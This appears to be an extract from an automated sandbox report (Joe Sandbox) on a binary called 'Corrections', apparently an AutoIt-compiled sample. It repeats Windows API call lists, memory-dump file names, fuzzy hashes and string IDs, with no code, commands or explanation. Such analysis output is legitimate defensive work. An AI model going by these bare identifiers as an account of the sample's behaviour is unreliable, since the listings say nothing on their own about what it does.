                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                                                                                                                                            • String ID: 0.0.0.0
                                                                                                                                                                                                                                                                                            • API String ID: 642191829-3771769585
                                                                                                                                                                                                                                                                                            • Opcode ID: 1767b027418cf1d0cf370488ed7afd7769844be46e8f804c72a032d43b29a3ee
                                                                                                                                                                                                                                                                                            • Instruction ID: fa870ff6f3a2fb240621fc4f29a21478417b0a6ba6f3cde2d94873f9eb1c1c8d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1767b027418cf1d0cf370488ed7afd7769844be46e8f804c72a032d43b29a3ee
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 30110372905115BBCB24BB70DD8AFEE77ACEF81721F0001B5F545A6191FF748A819B60
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _wcslen$LocalTime
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 952045576-0
                                                                                                                                                                                                                                                                                            • Opcode ID: e38dced48efb03ddfba5edcbf1da906dc812767950a66f720cfd4a602a3e7b06
                                                                                                                                                                                                                                                                                            • Instruction ID: ca5e995a2b9468475d4817c975b5be8dd4a3bac889054d5a0c5678efa0dbd7b9
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e38dced48efb03ddfba5edcbf1da906dc812767950a66f720cfd4a602a3e7b06
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 33416FA6C11214B5DB11EBB88C8AFCFB7ACAF45310F518462E518E3221FA34E255C7E6
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,009639E2,00000004,00000000,00000000), ref: 0093FC41
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,009639E2,00000004,00000000,00000000), ref: 0097FC15
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,009639E2,00000004,00000000,00000000), ref: 0097FC98
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ShowWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1268545403-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 45c982ed649605ae0c613231ca62445b4ddb84b03b5085029b3b08cc1ee5acc8
                                                                                                                                                                                                                                                                                            • Instruction ID: af0ce3187953ab28b4236f5bd15360f9f34ec866870aadab87d16552669737bf
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 45c982ed649605ae0c613231ca62445b4ddb84b03b5085029b3b08cc1ee5acc8
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 25415B31A4C3889EC7358B39CAB87797B95AB46310F18993CE9CE56960C635A840DF10
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 009B37B7
                                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 009B37BF
                                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009B37CA
                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 009B37D6
                                                                                                                                                                                                                                                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 009B3812
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 009B3823
                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,009B6504,?,?,000000FF,00000000,?,000000FF,?), ref: 009B385E
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 009B387D
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3864802216-0
                                                                                                                                                                                                                                                                                            • Opcode ID: d2c80c4d163e9a5d71d2bd29b96f75cff44660fd799125107c0904b7bbe0a583
                                                                                                                                                                                                                                                                                            • Instruction ID: b1d300ab3e064fe1ac3ee183404767d375b95850414c3c5d4814f0b19f7963b6
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d2c80c4d163e9a5d71d2bd29b96f75cff44660fd799125107c0904b7bbe0a583
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0631FF72215214BFEB148F50CD89FEB3FADEF09720F044165FE089A290D6B48C40CBA0
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                                                                                                                                            • API String ID: 0-572801152
                                                                                                                                                                                                                                                                                            • Opcode ID: 0cc33e9f6d6fbe0bd02dd2d2920115a0e1d2147394e6fc423491db85c6e64c9d
                                                                                                                                                                                                                                                                                            • Instruction ID: a0f43ca2463209d1b55be2863c0eaac0b2445f6d6100090fc97bf63beaf1a950
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0cc33e9f6d6fbe0bd02dd2d2920115a0e1d2147394e6fc423491db85c6e64c9d
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E3D1D371B0060A9FDF10CF58C885BAEB7B9FF89314F168569E905AB290D770DD41CBA0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00961B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 0096194E
                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00961B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 009619D1
                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00961B7B,?,00961B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00961A64
                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00961B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00961A7B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00953B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00946A79,?,0000015D,?,?,?,?,009485B0,000000FF,00000000,?,?), ref: 00953BC5
                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00961B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00961AF7
                                                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 00961B22
                                                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 00961B2E
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2829977744-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 4050a719aa9d2c9172d965d43f3f8e386318205c8875dabff40f09e28e0aee49
                                                                                                                                                                                                                                                                                            • Instruction ID: a6ace6bfa42c6d0f33409357a6ce79d589c392c7db2b19e850154cbedf9ca919
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4050a719aa9d2c9172d965d43f3f8e386318205c8875dabff40f09e28e0aee49
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5191D272E002169ADF248FB4D891EEEBBB9AF49350F1C0629E805E7280E735DD44DB60
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                                                                                                                                            • API String ID: 2610073882-625585964
                                                                                                                                                                                                                                                                                            • Opcode ID: 0a94394f933c1167c9fe1e33c4a2cf9327a61d4eb41a343e511b6b27a743ffdb
                                                                                                                                                                                                                                                                                            • Instruction ID: 5a79979f8e9f4213fdc640d9952e9909ef712edacb6e2ab939d5f095d66dd684
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0a94394f933c1167c9fe1e33c4a2cf9327a61d4eb41a343e511b6b27a743ffdb
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D7919D71A04619ABDF20CFA5C884FAFBBB8AF86314F118559F519AB280D7709945CFE0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00991C1B
                                                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00991C43
                                                                                                                                                                                                                                                                                            • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00991C67
                                                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00991C97
                                                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00991D1E
                                                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00991D83
                                                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00991DEF
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2550207440-0
                                                                                                                                                                                                                                                                                            • Opcode ID: a90730ef14f6df8ec104d7dd7f03fca7bf0caa4c0a1bb9ea5a3835f2637b8b6b
                                                                                                                                                                                                                                                                                            • Instruction ID: 176b258adf3d55c1392f350dd311a2b8b5f1f942d6a2f92027a4e6968bf20d54
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a90730ef14f6df8ec104d7dd7f03fca7bf0caa4c0a1bb9ea5a3835f2637b8b6b
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F91F375A0021A9FDF01DF98C884BBEB7B9FF49725F104029E951EB2A1E774A940CB50
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 009A43C8
                                                                                                                                                                                                                                                                                            • CharUpperBuffW.USER32(?,?), ref: 009A44D7
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 009A44E7
                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 009A467C
                                                                                                                                                                                                                                                                                              • Part of subcall function 0099169E: VariantInit.OLEAUT32(00000000), ref: 009916DE
                                                                                                                                                                                                                                                                                              • Part of subcall function 0099169E: VariantCopy.OLEAUT32(?,?), ref: 009916E7
                                                                                                                                                                                                                                                                                              • Part of subcall function 0099169E: VariantClear.OLEAUT32(?), ref: 009916F3
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                                                                                                                                                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                                                                                                                                            • API String ID: 4137639002-1221869570
                                                                                                                                                                                                                                                                                            • Opcode ID: 10a867f53b55a8b563fa3892aeea1694045b184dc7f2583b25a195ae201129cf
                                                                                                                                                                                                                                                                                            • Instruction ID: af7c7ec44116336877a011cb9d0b467d84abe19b08758a0f00e0d653f7b15977
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 10a867f53b55a8b563fa3892aeea1694045b184dc7f2583b25a195ae201129cf
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D7912675A083019FC714EF24C480A6AB7E9BFCA714F14892DF89A9B351DB71ED05CB92
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 009808FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00980831,80070057,?,?,?,00980C4E), ref: 0098091B
                                                                                                                                                                                                                                                                                              • Part of subcall function 009808FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00980831,80070057,?,?), ref: 00980936
                                                                                                                                                                                                                                                                                              • Part of subcall function 009808FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00980831,80070057,?,?), ref: 00980944
                                                                                                                                                                                                                                                                                              • Part of subcall function 009808FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00980831,80070057,?), ref: 00980954
                                                                                                                                                                                                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 009A56AE
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 009A57B6
                                                                                                                                                                                                                                                                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 009A582C
                                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(?), ref: 009A5837
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                                                                                                                                                                                            • String ID: NULL Pointer assignment
                                                                                                                                                                                                                                                                                            • API String ID: 614568839-2785691316
                                                                                                                                                                                                                                                                                            • Opcode ID: 370e8caa2eaa8291acf57ad26d62fa58a321d6130a5f12f202704bab9a64511a
                                                                                                                                                                                                                                                                                            • Instruction ID: b8b867a751ca5e2da5d907951882757cd422eebfe52c6547b2eeff3eea6ed550
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 370e8caa2eaa8291acf57ad26d62fa58a321d6130a5f12f202704bab9a64511a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8D911871D00629EFDF10EFA4D880EEEB7B8BF48314F114569E915A7251EB349A44CFA0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetMenu.USER32(?), ref: 009B2C1F
                                                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32(00000000), ref: 009B2C51
                                                                                                                                                                                                                                                                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 009B2C79
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 009B2CAF
                                                                                                                                                                                                                                                                                            • GetMenuItemID.USER32(?,?), ref: 009B2CE9
                                                                                                                                                                                                                                                                                            • GetSubMenu.USER32(?,?), ref: 009B2CF7
                                                                                                                                                                                                                                                                                              • Part of subcall function 00984393: GetWindowThreadProcessId.USER32(?,00000000), ref: 009843AD
                                                                                                                                                                                                                                                                                              • Part of subcall function 00984393: GetCurrentThreadId.KERNEL32 ref: 009843B4
                                                                                                                                                                                                                                                                                              • Part of subcall function 00984393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00982F00), ref: 009843BB
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 009B2D7F
                                                                                                                                                                                                                                                                                              • Part of subcall function 0098F292: Sleep.KERNEL32 ref: 0098F30A
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 4196846111-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 75c93c5faf7e501cfe7662381c8631546cc053cb4d83867043b90c1351666a58
                                                                                                                                                                                                                                                                                            • Instruction ID: 97e1ec84b083ff82cfc78d5dd9d3f4b8aedb4992022a8ff3cb3c216d12af3312
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 75c93c5faf7e501cfe7662381c8631546cc053cb4d83867043b90c1351666a58
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 16717175A00215AFCB11EF64C985BEEBBF5EF88320F148459E856EB351DB34AD41CB90
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • IsWindow.USER32(00000000), ref: 009B8992
                                                                                                                                                                                                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 009B899E
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 009B8A79
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,000000B0,?,?), ref: 009B8AAC
                                                                                                                                                                                                                                                                                            • IsDlgButtonChecked.USER32(?,00000000), ref: 009B8AE4
                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(00000000,000000EC), ref: 009B8B06
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 009B8B1E
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
